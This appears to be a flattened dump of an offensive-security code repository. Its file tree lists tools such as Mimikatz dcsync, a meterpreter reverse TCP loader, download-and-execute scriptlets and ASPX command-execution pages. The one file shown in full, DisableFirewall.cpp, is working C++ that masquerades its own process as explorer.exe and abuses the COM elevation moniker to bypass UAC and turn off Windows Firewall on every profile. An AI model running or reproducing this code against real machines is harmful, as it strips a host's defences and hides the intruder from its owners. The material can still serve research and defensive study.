├── 4.wsc ├── CVE-2017-8464.gif ├── Capcom.sys ├── DisableFirewall.cpp ├── Evilwow.png ├── ExpiredPassword.aspx(2013) ├── ExpiredPassword.aspx(2013)(HyperShell) ├── HTran.cpp ├── Hacking - Meterpreter Cheat Sheet.pdf ├── IFileOperation.cpp ├── MSBuildShelltest.csproj ├── MasqueradePEB.cpp ├── MicTray.exe ├── MicTray64.exe ├── Microsoft.ActiveDirectory.Management.dll ├── Microsoft.Exchange.Data(dll of Exchange2010).zip ├── Mimkatz-dcsync.zip ├── MySIP.c ├── NodeJS-Downloader.zip ├── PageLoad_ghostfile.aspx ├── RunProcessHacker.msi ├── SharpPELoader_parselsass.cs ├── UserAdd.msi ├── XamlToViewState.zip ├── a.exe ├── addon.node ├── calc.dll ├── calc.hta ├── calc.ppa ├── calc.ps1 ├── calc.xlam ├── calc2.ps1 ├── calc_x64.dll ├── calcbase64.txt ├── calcexit.dll ├── calcmutex.dll ├── calcmutex_x64.dll ├── cliramdisk&imdisk.rar ├── com_zimbra_example_simplejspaction.zip ├── com_zimbra_test.zip ├── csv.xsl ├── csvde.zip ├── dnscmd.exe ├── dnscmd.exe.mui ├── download.js ├── downloadexec.sct ├── downloadexec2.sct ├── downloadexec3.sct ├── dumpert.dll ├── execCmd.aspx ├── execUI.aspx ├── fb.py ├── helloworld.html ├── inline task executes mimikatz.txt ├── katz.txt ├── messagebox.dll ├── meterpreter_reverse_tcp.cpp ├── msg.dll ├── msg_x64.dll ├── netshtest.cpp ├── oabextract ├── putty.exe ├── rar.exe ├── rpcloader.exe ├── test ├── test.conf ├── test.msi ├── test.ps1 ├── test1.sct ├── test2.cab ├── test3.msi ├── testmsi.png ├── testprocexp.exe ├── vbs ├── version.txt ├── version1.txt └── x.py /4.wsc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 10 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /CVE-2017-8464.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/CVE-2017-8464.gif 
-------------------------------------------------------------------------------- /Capcom.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Capcom.sys -------------------------------------------------------------------------------- /DisableFirewall.cpp: -------------------------------------------------------------------------------- 1 | //Author: 3gstudent 2 | //Use to disable Windows Firewall with normal user permissions. 3 | //Expand on IFileOperation of UAC bypass. 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #define RTL_MAX_DRIVE_LETTERS 32 10 | #define GDI_HANDLE_BUFFER_SIZE32 34 11 | #define GDI_HANDLE_BUFFER_SIZE64 60 12 | #define GDI_BATCH_BUFFER_SIZE 310 13 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 14 | #ifndef NT_SUCCESS 15 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 16 | #endif 17 | 18 | #if !defined(_M_X64) 19 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 20 | #else 21 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 22 | #endif 23 | 24 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 25 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 26 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 27 | 28 | typedef struct _UNICODE_STRING { 29 | USHORT Length; 30 | USHORT MaximumLength; 31 | PWSTR Buffer; 32 | } UNICODE_STRING; 33 | typedef UNICODE_STRING *PUNICODE_STRING; 34 | 35 | 36 | typedef struct _STRING { 37 | USHORT Length; 38 | USHORT MaximumLength; 39 | PCHAR Buffer; 40 | } STRING; 41 | typedef STRING *PSTRING; 42 | 43 | typedef struct _CLIENT_ID { 44 | HANDLE UniqueProcess; 45 | HANDLE UniqueThread; 46 | } CLIENT_ID, *PCLIENT_ID; 47 | 48 | typedef struct _CLIENT_ID64 { 49 | ULONG64 UniqueProcess; 50 | ULONG64 UniqueThread; 51 | } CLIENT_ID64, *PCLIENT_ID64; 52 | 53 | typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { 54 | LIST_ENTRY 
InLoadOrderLinks; 55 | LIST_ENTRY InMemoryOrderLinks; 56 | union 57 | { 58 | LIST_ENTRY InInitializationOrderLinks; 59 | LIST_ENTRY InProgressLinks; 60 | } DUMMYUNION0; 61 | PVOID DllBase; 62 | PVOID EntryPoint; 63 | ULONG SizeOfImage; 64 | UNICODE_STRING FullDllName; 65 | UNICODE_STRING BaseDllName; 66 | union 67 | { 68 | ULONG Flags; 69 | struct 70 | { 71 | ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1 72 | ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1 73 | ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1 74 | ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1 75 | ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1 76 | ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1 77 | ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1 78 | ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1 79 | ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1 80 | ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1 81 | ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2 82 | ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1 83 | ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1 84 | ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1 85 | ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1 86 | ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2 87 | ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1 88 | ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1 89 | ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1 90 | ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1 91 | ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1 92 | ULONG DontRelocate : 1; 
// Size=4 Offset=104 BitOffset=23 BitCount=1 93 | ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1 94 | ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1 95 | ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2 96 | ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1 97 | ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2 98 | ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1 99 | }; 100 | } ENTRYFLAGSUNION; 101 | WORD ObsoleteLoadCount; 102 | WORD TlsIndex; 103 | union 104 | { 105 | LIST_ENTRY HashLinks; 106 | struct 107 | { 108 | PVOID SectionPointer; 109 | ULONG CheckSum; 110 | }; 111 | } DUMMYUNION1; 112 | union 113 | { 114 | ULONG TimeDateStamp; 115 | PVOID LoadedImports; 116 | } DUMMYUNION2; 117 | //fields below removed for compatibility 118 | } LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; 119 | typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; 120 | 121 | typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; 122 | 123 | typedef struct _PEB_LDR_DATA { 124 | ULONG Length; 125 | BOOLEAN Initialized; 126 | HANDLE SsHandle; 127 | LIST_ENTRY InLoadOrderModuleList; 128 | LIST_ENTRY InMemoryOrderModuleList; 129 | LIST_ENTRY InInitializationOrderModuleList; 130 | PVOID EntryInProgress; 131 | BOOLEAN ShutdownInProgress; 132 | HANDLE ShutdownThreadId; 133 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 134 | 135 | 136 | typedef struct _CURDIR { 137 | UNICODE_STRING DosPath; 138 | HANDLE Handle; 139 | } CURDIR, *PCURDIR; 140 | 141 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 142 | USHORT Flags; 143 | USHORT Length; 144 | ULONG TimeStamp; 145 | STRING DosPath; 146 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 147 | 148 | 149 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 150 | ULONG MaximumLength; 151 | ULONG Length; 152 | 153 | ULONG Flags; 154 | ULONG DebugFlags; 155 | 156 | HANDLE ConsoleHandle; 157 | ULONG ConsoleFlags; 
158 | HANDLE StandardInput; 159 | HANDLE StandardOutput; 160 | HANDLE StandardError; 161 | 162 | CURDIR CurrentDirectory; 163 | UNICODE_STRING DllPath; 164 | UNICODE_STRING ImagePathName; 165 | UNICODE_STRING CommandLine; 166 | PVOID Environment; 167 | 168 | ULONG StartingX; 169 | ULONG StartingY; 170 | ULONG CountX; 171 | ULONG CountY; 172 | ULONG CountCharsX; 173 | ULONG CountCharsY; 174 | ULONG FillAttribute; 175 | 176 | ULONG WindowFlags; 177 | ULONG ShowWindowFlags; 178 | UNICODE_STRING WindowTitle; 179 | UNICODE_STRING DesktopInfo; 180 | UNICODE_STRING ShellInfo; 181 | UNICODE_STRING RuntimeData; 182 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 183 | 184 | ULONG EnvironmentSize; 185 | ULONG EnvironmentVersion; 186 | PVOID PackageDependencyData; //8+ 187 | ULONG ProcessGroupId; 188 | // ULONG LoaderThreads; 189 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 190 | 191 | typedef struct _PEB { 192 | BOOLEAN InheritedAddressSpace; 193 | BOOLEAN ReadImageFileExecOptions; 194 | BOOLEAN BeingDebugged; 195 | union 196 | { 197 | BOOLEAN BitField; 198 | struct 199 | { 200 | BOOLEAN ImageUsesLargePages : 1; 201 | BOOLEAN IsProtectedProcess : 1; 202 | BOOLEAN IsImageDynamicallyRelocated : 1; 203 | BOOLEAN SkipPatchingUser32Forwarders : 1; 204 | BOOLEAN IsPackagedProcess : 1; 205 | BOOLEAN IsAppContainer : 1; 206 | BOOLEAN IsProtectedProcessLight : 1; 207 | BOOLEAN IsLongPathAwareProcess : 1; 208 | }; 209 | }; 210 | HANDLE Mutant; 211 | 212 | PVOID ImageBaseAddress; 213 | PPEB_LDR_DATA Ldr; 214 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 215 | PVOID SubSystemData; 216 | PVOID ProcessHeap; 217 | PRTL_CRITICAL_SECTION FastPebLock; 218 | PVOID AtlThunkSListPtr; 219 | PVOID IFEOKey; 220 | union 221 | { 222 | ULONG CrossProcessFlags; 223 | struct 224 | { 225 | ULONG ProcessInJob : 1; 226 | ULONG ProcessInitializing : 1; 227 | ULONG ProcessUsingVEH : 1; 228 | ULONG ProcessUsingVCH : 1; 229 | ULONG ProcessUsingFTH : 1; 230 | ULONG 
ProcessPreviouslyThrottled : 1; 231 | ULONG ProcessCurrentlyThrottled : 1; 232 | ULONG ReservedBits0 : 25; 233 | }; 234 | ULONG EnvironmentUpdateCount; 235 | }; 236 | union 237 | { 238 | PVOID KernelCallbackTable; 239 | PVOID UserSharedInfoPtr; 240 | }; 241 | ULONG SystemReserved[1]; 242 | ULONG AtlThunkSListPtr32; 243 | PVOID ApiSetMap; 244 | ULONG TlsExpansionCounter; 245 | PVOID TlsBitmap; 246 | ULONG TlsBitmapBits[2]; 247 | PVOID ReadOnlySharedMemoryBase; 248 | PVOID HotpatchInformation; 249 | PVOID *ReadOnlyStaticServerData; 250 | PVOID AnsiCodePageData; 251 | PVOID OemCodePageData; 252 | PVOID UnicodeCaseTableData; 253 | 254 | ULONG NumberOfProcessors; 255 | ULONG NtGlobalFlag; 256 | 257 | LARGE_INTEGER CriticalSectionTimeout; 258 | SIZE_T HeapSegmentReserve; 259 | SIZE_T HeapSegmentCommit; 260 | SIZE_T HeapDeCommitTotalFreeThreshold; 261 | SIZE_T HeapDeCommitFreeBlockThreshold; 262 | 263 | ULONG NumberOfHeaps; 264 | ULONG MaximumNumberOfHeaps; 265 | PVOID *ProcessHeaps; 266 | 267 | PVOID GdiSharedHandleTable; 268 | PVOID ProcessStarterHelper; 269 | ULONG GdiDCAttributeList; 270 | 271 | PRTL_CRITICAL_SECTION LoaderLock; 272 | 273 | ULONG OSMajorVersion; 274 | ULONG OSMinorVersion; 275 | USHORT OSBuildNumber; 276 | USHORT OSCSDVersion; 277 | ULONG OSPlatformId; 278 | ULONG ImageSubsystem; 279 | ULONG ImageSubsystemMajorVersion; 280 | ULONG ImageSubsystemMinorVersion; 281 | ULONG_PTR ImageProcessAffinityMask; 282 | GDI_HANDLE_BUFFER GdiHandleBuffer; 283 | PVOID PostProcessInitRoutine; 284 | 285 | PVOID TlsExpansionBitmap; 286 | ULONG TlsExpansionBitmapBits[32]; 287 | 288 | ULONG SessionId; 289 | 290 | ULARGE_INTEGER AppCompatFlags; 291 | ULARGE_INTEGER AppCompatFlagsUser; 292 | PVOID pShimData; 293 | PVOID AppCompatInfo; 294 | 295 | UNICODE_STRING CSDVersion; 296 | 297 | PVOID ActivationContextData; 298 | PVOID ProcessAssemblyStorageMap; 299 | PVOID SystemDefaultActivationContextData; 300 | PVOID SystemAssemblyStorageMap; 301 | 302 | SIZE_T MinimumStackCommit; 
303 | 304 | PVOID *FlsCallback; 305 | LIST_ENTRY FlsListHead; 306 | PVOID FlsBitmap; 307 | ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; 308 | ULONG FlsHighIndex; 309 | 310 | PVOID WerRegistrationData; 311 | PVOID WerShipAssertPtr; 312 | PVOID pContextData; 313 | PVOID pImageHeaderHash; 314 | union 315 | { 316 | ULONG TracingFlags; 317 | struct 318 | { 319 | ULONG HeapTracingEnabled : 1; 320 | ULONG CritSecTracingEnabled : 1; 321 | ULONG LibLoaderTracingEnabled : 1; 322 | ULONG SpareTracingBits : 29; 323 | }; 324 | }; 325 | ULONGLONG CsrServerReadOnlySharedMemoryBase; 326 | } PEB, *PPEB; 327 | 328 | typedef struct _GDI_TEB_BATCH { 329 | ULONG Offset; 330 | UCHAR Alignment[4]; 331 | ULONG_PTR HDC; 332 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 333 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; 334 | 335 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 336 | ULONG Flags; 337 | PSTR FrameName; 338 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; 339 | 340 | typedef struct _TEB_ACTIVE_FRAME { 341 | ULONG Flags; 342 | struct _TEB_ACTIVE_FRAME *Previous; 343 | PTEB_ACTIVE_FRAME_CONTEXT Context; 344 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; 345 | 346 | typedef struct _TEB { 347 | NT_TIB NtTib; 348 | 349 | PVOID EnvironmentPointer; 350 | CLIENT_ID ClientId; 351 | PVOID ActiveRpcHandle; 352 | PVOID ThreadLocalStoragePointer; 353 | PPEB ProcessEnvironmentBlock; 354 | 355 | ULONG LastErrorValue; 356 | ULONG CountOfOwnedCriticalSections; 357 | PVOID CsrClientThread; 358 | PVOID Win32ThreadInfo; 359 | ULONG User32Reserved[26]; 360 | ULONG UserReserved[5]; 361 | PVOID WOW32Reserved; 362 | LCID CurrentLocale; 363 | ULONG FpSoftwareStatusRegister; 364 | PVOID SystemReserved1[54]; 365 | NTSTATUS ExceptionCode; 366 | PVOID ActivationContextStackPointer; 367 | #if defined(_M_X64) 368 | UCHAR SpareBytes[24]; 369 | #else 370 | UCHAR SpareBytes[36]; 371 | #endif 372 | ULONG TxFsContext; 373 | 374 | GDI_TEB_BATCH GdiTebBatch; 375 | CLIENT_ID RealClientId; 376 | HANDLE 
GdiCachedProcessHandle; 377 | ULONG GdiClientPID; 378 | ULONG GdiClientTID; 379 | PVOID GdiThreadLocalInfo; 380 | ULONG_PTR Win32ClientInfo[62]; 381 | PVOID glDispatchTable[233]; 382 | ULONG_PTR glReserved1[29]; 383 | PVOID glReserved2; 384 | PVOID glSectionInfo; 385 | PVOID glSection; 386 | PVOID glTable; 387 | PVOID glCurrentRC; 388 | PVOID glContext; 389 | 390 | NTSTATUS LastStatusValue; 391 | UNICODE_STRING StaticUnicodeString; 392 | WCHAR StaticUnicodeBuffer[261]; 393 | 394 | PVOID DeallocationStack; 395 | PVOID TlsSlots[64]; 396 | LIST_ENTRY TlsLinks; 397 | 398 | PVOID Vdm; 399 | PVOID ReservedForNtRpc; 400 | PVOID DbgSsReserved[2]; 401 | 402 | ULONG HardErrorMode; 403 | #if defined(_M_X64) 404 | PVOID Instrumentation[11]; 405 | #else 406 | PVOID Instrumentation[9]; 407 | #endif 408 | GUID ActivityId; 409 | 410 | PVOID SubProcessTag; 411 | PVOID EtwLocalData; 412 | PVOID EtwTraceData; 413 | PVOID WinSockData; 414 | ULONG GdiBatchCount; 415 | 416 | union 417 | { 418 | PROCESSOR_NUMBER CurrentIdealProcessor; 419 | ULONG IdealProcessorValue; 420 | struct 421 | { 422 | UCHAR ReservedPad0; 423 | UCHAR ReservedPad1; 424 | UCHAR ReservedPad2; 425 | UCHAR IdealProcessor; 426 | }; 427 | }; 428 | 429 | ULONG GuaranteedStackBytes; 430 | PVOID ReservedForPerf; 431 | PVOID ReservedForOle; 432 | ULONG WaitingOnLoaderLock; 433 | PVOID SavedPriorityState; 434 | ULONG_PTR SoftPatchPtr1; 435 | PVOID ThreadPoolData; 436 | PVOID *TlsExpansionSlots; 437 | #if defined(_M_X64) 438 | PVOID DeallocationBStore; 439 | PVOID BStoreLimit; 440 | #endif 441 | ULONG MuiGeneration; 442 | ULONG IsImpersonating; 443 | PVOID NlsCache; 444 | PVOID pShimData; 445 | ULONG HeapVirtualAffinity; 446 | HANDLE CurrentTransactionHandle; 447 | PTEB_ACTIVE_FRAME ActiveFrame; 448 | PVOID FlsData; 449 | 450 | PVOID PreferredLanguages; 451 | PVOID UserPrefLanguages; 452 | PVOID MergedPrefLanguages; 453 | ULONG MuiImpersonation; 454 | 455 | union 456 | { 457 | USHORT CrossTebFlags; 458 | USHORT 
SpareCrossTebBits : 16; 459 | }; 460 | union 461 | { 462 | USHORT SameTebFlags; 463 | struct 464 | { 465 | USHORT SafeThunkCall : 1; 466 | USHORT InDebugPrint : 1; 467 | USHORT HasFiberData : 1; 468 | USHORT SkipThreadAttach : 1; 469 | USHORT WerInShipAssertCode : 1; 470 | USHORT RanProcessInit : 1; 471 | USHORT ClonedThread : 1; 472 | USHORT SuppressDebugMsg : 1; 473 | USHORT DisableUserStackWalk : 1; 474 | USHORT RtlExceptionAttached : 1; 475 | USHORT InitialThread : 1; 476 | USHORT SpareSameTebBits : 1; 477 | }; 478 | }; 479 | 480 | PVOID TxnScopeEnterCallback; 481 | PVOID TxnScopeExitCallback; 482 | PVOID TxnScopeContext; 483 | ULONG LockCount; 484 | ULONG SpareUlong0; 485 | PVOID ResourceRetValue; 486 | } TEB, *PTEB; 487 | 488 | typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( 489 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 490 | _In_ PVOID Context, 491 | _Inout_ BOOLEAN *StopEnumeration 492 | ); 493 | 494 | typedef PVOID NTAPI RTLINITUNICODESTRING( 495 | _Inout_ PUNICODE_STRING DestinationString, 496 | _In_opt_ PCWSTR SourceString 497 | ); 498 | typedef RTLINITUNICODESTRING FAR * LPRTLINITUNICODESTRING; 499 | LPRTLINITUNICODESTRING RtlInitUnicodeString; 500 | 501 | typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION( 502 | _In_ PRTL_CRITICAL_SECTION CriticalSection 503 | ); 504 | typedef RTLENTERCRITICALSECTION FAR * LPRTLENTERCRITICALSECTION; 505 | LPRTLENTERCRITICALSECTION RtlEnterCriticalSection; 506 | 507 | typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION( 508 | _In_ PRTL_CRITICAL_SECTION CriticalSection 509 | ); 510 | typedef RTLLEAVECRITICALSECTION FAR * LPRTLLEAVECRITICALSECTION; 511 | LPRTLLEAVECRITICALSECTION RtlLeaveCriticalSection; 512 | 513 | typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES( 514 | _In_opt_ ULONG Flags, 515 | _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, 516 | _In_opt_ PVOID Context); 517 | typedef LDRENUMERATELOADEDMODULES FAR * LPLDRENUMERATELOADEDMODULES; 518 | 
LPLDRENUMERATELOADEDMODULES LdrEnumerateLoadedModules; 519 | 520 | typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY( 521 | _In_ HANDLE ProcessHandle, 522 | _Inout_ PVOID *BaseAddress, 523 | _In_ ULONG_PTR ZeroBits, 524 | _Inout_ PSIZE_T RegionSize, 525 | _In_ ULONG AllocationType, 526 | _In_ ULONG Protect 527 | ); 528 | typedef NTALLOCATEVIRTUALMEMORY FAR * LPNTALLOCATEVIRTUALMEMORY; 529 | LPNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory; 530 | 531 | //LPWSTR g_lpszExplorer2 = TEXT("C:\\windows\\explorer.exe"); 532 | LPWSTR g_lpszExplorer2 = L"C:\\windows\\explorer.exe"; 533 | 534 | VOID NTAPI supxLdrEnumModulesCallback( 535 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 536 | _In_ PVOID Context, 537 | _Inout_ BOOLEAN *StopEnumeration 538 | ) 539 | { 540 | PPEB Peb = (PPEB)Context; 541 | 542 | if (DataTableEntry->DllBase == Peb->ImageBaseAddress) { 543 | RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2); 544 | RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe"); 545 | *StopEnumeration = TRUE; 546 | } 547 | else { 548 | *StopEnumeration = FALSE; 549 | } 550 | } 551 | 552 | __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } 553 | 554 | VOID supMasqueradeProcess( 555 | VOID 556 | ) 557 | { 558 | NTSTATUS Status; 559 | PPEB Peb = NtCurrentPeb(); 560 | SIZE_T RegionSize; 561 | 562 | PVOID g_lpszExplorer = NULL; 563 | RegionSize = 0x1000; 564 | 565 | Status = NtAllocateVirtualMemory( 566 | NtCurrentProcess(), 567 | &g_lpszExplorer, 568 | 0, 569 | &RegionSize, 570 | MEM_COMMIT | MEM_RESERVE, 571 | PAGE_READWRITE); 572 | 573 | if (NT_SUCCESS(Status)) { 574 | RtlEnterCriticalSection(Peb->FastPebLock); 575 | 576 | RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2); 577 | RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2); 578 | RtlInitUnicodeString(&Peb->ProcessParameters->CurrentDirectory.DosPath, L"C:\\windows\\system32"); 579 | 580 | 581 | 
RtlLeaveCriticalSection(Peb->FastPebLock); 582 | 583 | LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb); 584 | } 585 | } 586 | 587 | 588 | 589 | int _tmain(int argc, _TCHAR* argv[]) 590 | { 591 | HINSTANCE hinstStub = GetModuleHandle(_T("ntdll.dll")); 592 | if(hinstStub) 593 | { 594 | RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(hinstStub, "RtlInitUnicodeString"); 595 | if (!RtlInitUnicodeString) 596 | { 597 | printf("Could not find RtlInitUnicodeString entry point in NTDLL.DLL"); 598 | exit(0); 599 | } 600 | 601 | RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(hinstStub, "RtlEnterCriticalSection"); 602 | if (!RtlEnterCriticalSection) 603 | { 604 | printf("Could not find RtlEnterCriticalSection entry point in NTDLL.DLL"); 605 | exit(0); 606 | } 607 | 608 | RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(hinstStub, "RtlLeaveCriticalSection"); 609 | if (!RtlLeaveCriticalSection) 610 | { 611 | printf("Could not find RtlLeaveCriticalSection entry point in NTDLL.DLL"); 612 | exit(0); 613 | } 614 | 615 | LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(hinstStub, "LdrEnumerateLoadedModules"); 616 | if (!LdrEnumerateLoadedModules) 617 | { 618 | printf("Could not find LdrEnumerateLoadedModules entry point in NTDLL.DLL"); 619 | exit(0); 620 | } 621 | 622 | NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(hinstStub, "NtAllocateVirtualMemory"); 623 | if (!NtAllocateVirtualMemory) 624 | { 625 | printf("Could not find NtAllocateVirtualMemory entry point in NTDLL.DLL"); 626 | exit(0); 627 | } 628 | } 629 | else 630 | { 631 | printf("Could not GetModuleHandle of NTDLL.DLL"); 632 | exit(0); 633 | } 634 | 635 | supMasqueradeProcess(); 636 | 637 | 638 | HRESULT hrComInit = S_OK; 639 | HRESULT hr = S_OK; 640 | INetFwPolicy2 *pNetFwPolicy2 = NULL; 641 | 642 | // Initialize COM. 
643 | hrComInit = CoInitializeEx( 644 | 0, 645 | COINIT_APARTMENTTHREADED 646 | ); 647 | 648 | // Ignore RPC_E_CHANGED_MODE; this just means that COM has already been 649 | // initialized with a different mode. Since we don't care what the mode is, 650 | // we'll just use the existing mode. 651 | if (hrComInit != RPC_E_CHANGED_MODE) 652 | { 653 | if (FAILED(hrComInit)) 654 | { 655 | printf("CoInitializeEx failed: 0x%08lx\n", hrComInit); 656 | // Release INetFwPolicy2 657 | if (pNetFwPolicy2 != NULL) 658 | { 659 | pNetFwPolicy2->Release(); 660 | } 661 | 662 | // Uninitialize COM. 663 | if (SUCCEEDED(hrComInit)) 664 | { 665 | CoUninitialize(); 666 | } 667 | return 0; 668 | } 669 | } 670 | 671 | // Retrieve INetFwPolicy2 672 | // hr = WFCOMInitialize(&pNetFwPolicy2); 673 | hr = CoCreateInstance(__uuidof(NetFwPolicy2), NULL, CLSCTX_ALL, IID_PPV_ARGS(&pNetFwPolicy2)); 674 | if (FAILED(hr)) 675 | { 676 | printf("CoCreateInstance for INetFwPolicy2 failed: 0x%08lx\n", hr); 677 | exit(0); 678 | } 679 | 680 | HWND hwnd = GetConsoleWindow(); 681 | BIND_OPTS3 bo; 682 | WCHAR wszCLSID[50]; 683 | WCHAR wszMonikerName[300]; 684 | void ** ppv = NULL; 685 | StringFromGUID2( __uuidof(NetFwPolicy2),wszCLSID,sizeof(wszCLSID)/sizeof(wszCLSID[0])); 686 | hr = StringCchPrintf(wszMonikerName,sizeof(wszMonikerName)/sizeof(wszMonikerName[0]),L"Elevation:Administrator!new:%s", wszCLSID); 687 | memset(&bo, 0, sizeof(bo)); 688 | bo.cbStruct = sizeof(bo); 689 | bo.hwnd = hwnd; 690 | bo.dwClassContext = CLSCTX_LOCAL_SERVER; 691 | hr = CoGetObject(wszMonikerName, &bo, IID_PPV_ARGS(&pNetFwPolicy2)); 692 | 693 | // Disable Windows Firewall for the Domain profile 694 | hr = pNetFwPolicy2->put_FirewallEnabled(NET_FW_PROFILE2_DOMAIN, FALSE); 695 | if (FAILED(hr)) 696 | { 697 | printf("put_FirewallEnabled failed for Domain: 0x%08lx\n", hr); 698 | // Release INetFwPolicy2 699 | if (pNetFwPolicy2 != NULL) 700 | { 701 | pNetFwPolicy2->Release(); 702 | } 703 | 704 | // Uninitialize COM. 
705 | if (SUCCEEDED(hrComInit)) 706 | { 707 | CoUninitialize(); 708 | } 709 | return 0; 710 | } 711 | 712 | // Disable Windows Firewall for the Private profile 713 | hr = pNetFwPolicy2->put_FirewallEnabled(NET_FW_PROFILE2_PRIVATE, FALSE); 714 | if (FAILED(hr)) 715 | { 716 | printf("put_FirewallEnabled failed for Private: 0x%08lx\n", hr); 717 | // Release INetFwPolicy2 718 | if (pNetFwPolicy2 != NULL) 719 | { 720 | pNetFwPolicy2->Release(); 721 | } 722 | 723 | // Uninitialize COM. 724 | if (SUCCEEDED(hrComInit)) 725 | { 726 | CoUninitialize(); 727 | } 728 | return 0; 729 | } 730 | 731 | // Disable Windows Firewall for the Public profile 732 | hr = pNetFwPolicy2->put_FirewallEnabled(NET_FW_PROFILE2_PUBLIC, FALSE); 733 | if (FAILED(hr)) 734 | { 735 | printf("put_FirewallEnabled failed for Public: 0x%08lx\n", hr); 736 | // Release INetFwPolicy2 737 | if (pNetFwPolicy2 != NULL) 738 | { 739 | pNetFwPolicy2->Release(); 740 | } 741 | 742 | // Uninitialize COM. 743 | if (SUCCEEDED(hrComInit)) 744 | { 745 | CoUninitialize(); 746 | } 747 | } 748 | return 0; 749 | } 750 | 751 | -------------------------------------------------------------------------------- /Evilwow.png: -------------------------------------------------------------------------------- 